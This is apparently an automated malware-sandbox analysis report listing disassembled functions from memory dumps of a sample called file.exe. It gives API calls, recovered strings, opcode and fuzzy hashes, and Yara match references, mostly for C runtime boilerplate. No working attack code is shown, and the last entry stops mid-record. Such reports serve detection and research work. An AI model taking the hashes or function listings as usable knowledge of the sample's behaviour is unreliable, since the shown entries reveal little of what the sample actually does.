Instruction ID: 9abdb5ca990c45552604c09b9521349b4d8dc8e70a69a264998537c6607334a1
Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
Instruction Fuzzy Hash: D151B372601626AFEB698F18DB40BFA77B4EF00314F14452DDE415B6A0E731F990EB60

Function 04A21867 Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04A2186C

Part of subcall function 04A29AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04A29AF5

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,0042D884,?,?,?,0042D954,0042D955), ref: 04A218A2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,0042D884,?,?,?,0042D954,0042D955), ref: 04A218D9
Concurrency::cancel_current_task.LIBCPMT ref: 04A219EE

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
String ID:
API String ID: 2123813255-0
Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
Instruction ID: 5c7279300887b50b0d0916ae7eb3c45d23d60346cd42e096b8f0180ee0da2081
Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
Instruction Fuzzy Hash: 5541C8B1B00324ABE7249F6CDE85B5AB7F8EF44214F100A25E95AD7280E771B904E7A1

Function 10007BCE Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 100081F0: _free.LIBCMT ref: 100081FE

Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70

GetLastError.KERNEL32 ref: 10007C36
__dosmaperr.LIBCMT ref: 10007C3D
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
__dosmaperr.LIBCMT ref: 10007C83

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
Instruction ID: 4d86bd2ae757562d8160192595c5732c56f34f1228d97d68919d00ee2a874974
Opcode Fuzzy Hash: b7af9aa25762b68c67a19e1abcb47a9b758bf4775fc138b5a0a35b694754267d
Instruction Fuzzy Hash: 9021AC75A00216AFB720DF658C85D5BB7ADFF042E4B108529FA699724ADB35EC408BA0

Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9

GetLastError.KERNEL32 ref: 00417548
__dosmaperr.LIBCMT ref: 0041754F
GetLastError.KERNEL32(?,?,?,?), ref: 00417589
__dosmaperr.LIBCMT ref: 00417590

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768

Function 04A3774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 04A351FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04A35462,?,00000000,-00000008), ref: 04A35260

GetLastError.KERNEL32 ref: 04A377AF
__dosmaperr.LIBCMT ref: 04A377B6
GetLastError.KERNEL32(?,?,?,?), ref: 04A377F0
__dosmaperr.LIBCMT ref: 04A377F7

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
Instruction ID: a44268c768c2ce30bde560fb0bbb5eed64790eb67a1ef1867ba386538fc8b0b6
Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
Instruction Fuzzy Hash: 5F217FB9600215AFAB11AF658E80C6BB7A8FF4426A710C529F91997250F731FC40DBA0

Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768

Function 04A31482 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
Instruction ID: 0f6bc4012ebacc41337ea3bb1136e2941c634deaccde2fc0d2216c43956b30a5
Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
Instruction Fuzzy Hash: EC219371300215AFEB20AF65DD80D7B77ADAF4826A7108525F91ADB150FB30FC5197A0

Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041848D

Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E

Function 04A335E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,04A336EF,04A2381E,?,00000000,04A22AA0,04A22AA2,?,04A33868,00000022,00420B0C,00422950,00422958,04A22AA0), ref: 04A336A1

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
Instruction ID: 831bc9feab6470cc5f0688f29f5c7891bde780529fbcadc4f27c9515a29ea6d0
Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
Instruction Fuzzy Hash: B021C071A05620AFCB319B65EC40A5B3B689B467A1B150224FD06AB3A1FB70FD05D794

Function 04A386EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 04A386F4

Part of subcall function 04A351FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04A35462,?,00000000,-00000008), ref: 04A35260

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04A3872C
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04A3874C

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
Instruction ID: e80dea07363d67d4a25a695f3789c239b15c6c6ea6cda725b7bea16dc9a75890
Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
Instruction Fuzzy Hash: F911A1F6A051197F7B213BB65DC9CBF29AECF4919B3000528F902A1100FA68BE0182B5

Function 10006E9C Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
_free.LIBCMT ref: 10006EFE
_free.LIBCMT ref: 10006F34
SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631

Function 10006FF3 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
_free.LIBCMT ref: 10007055
_free.LIBCMT ref: 1000708B
SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631

Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B

Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21

___initconout.LIBCMT ref: 0041CC5B

Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8

Function 1000CD22 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45

Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B

___initconout.LIBCMT ref: 1000CD55

Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90

Function 04A3CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04A3CB06,00000000,00000001,?,00000000,?,04A39D25,00000000,00000000,00000000), ref: 04A3CEA6
GetLastError.KERNEL32(?,04A3CB06,00000000,00000001,?,00000000,?,04A39D25,00000000,00000000,00000000,00000000,00000000,?,04A3A2C8,?), ref: 04A3CEB2

Part of subcall function 04A3CE78: CloseHandle.KERNEL32(0042CA30,04A3CEC2,?,04A3CB06,00000000,00000001,?,00000000,?,04A39D25,00000000,00000000,00000000,00000000,00000000), ref: 04A3CE88

___initconout.LIBCMT ref: 04A3CEC2

Part of subcall function 04A3CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04A3CE69,04A3CAF3,00000000,?,04A39D25,00000000,00000000,00000000,00000000), ref: 04A3CE4D

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04A3CB06,00000000,00000001,?,00000000,?,04A39D25,00000000,00000000,00000000,00000000), ref: 04A3CED7

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
Instruction ID: 5f363f66fb1b21e1429974b12e474022480a4ae5b923a07a683aa77b257e5254
Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
Instruction Fuzzy Hash: B9F01C37540218BBCF225F95ED08A8A3F26FF086B2B558020FA19A6120E73298219BD4

Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD

Function 100067E8 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100067F1

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

_free.LIBCMT ref: 10006804
_free.LIBCMT ref: 10006815
_free.LIBCMT ref: 10006826

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3

Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00410FAD

Strings

pow, xrefs: 00410F85, 00410FA2

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E

Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
std::_Xinvalid_argument.LIBCPMT ref: 00409725

Strings

vector too long, xrefs: 00409720

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
String ID: vector too long
API String ID: 3646673767-2873823879
Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5

Function 10006038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\file.exe, xrefs: 1000607B, 10006082, 100060B8

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\file.exe
API String ID: 0-4010620828
Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90

Function 04A2BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 04A2BAA6
__IsNonwritableInCurrentImage.LIBCMT ref: 04A2BB5A

Strings

csm, xrefs: 04A2BB44

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
Instruction ID: 8050c9d4649a5273f2991f17f6ffc31896c3f92ec42d42f0ab76cc778c772bb5
Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
Instruction Fuzzy Hash: E341B830E00229ABDF10DF6CCA84AAEBBB5EF45328F548165E8145B355D735FA01DBA0

Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5

Strings

RCC, xrefs: 0040C0DF
MOC, xrefs: 0040C0D7

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58

Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 100044FB

Strings

MOC, xrefs: 1000450D
RCC, xrefs: 10004515

Memory Dump Source

Source File: 00000000.00000002.1950094801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1950073268.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950119045.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1950143184.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_file.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55

Function 04A2C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04A2C32C

Strings

MOC, xrefs: 04A2C33E
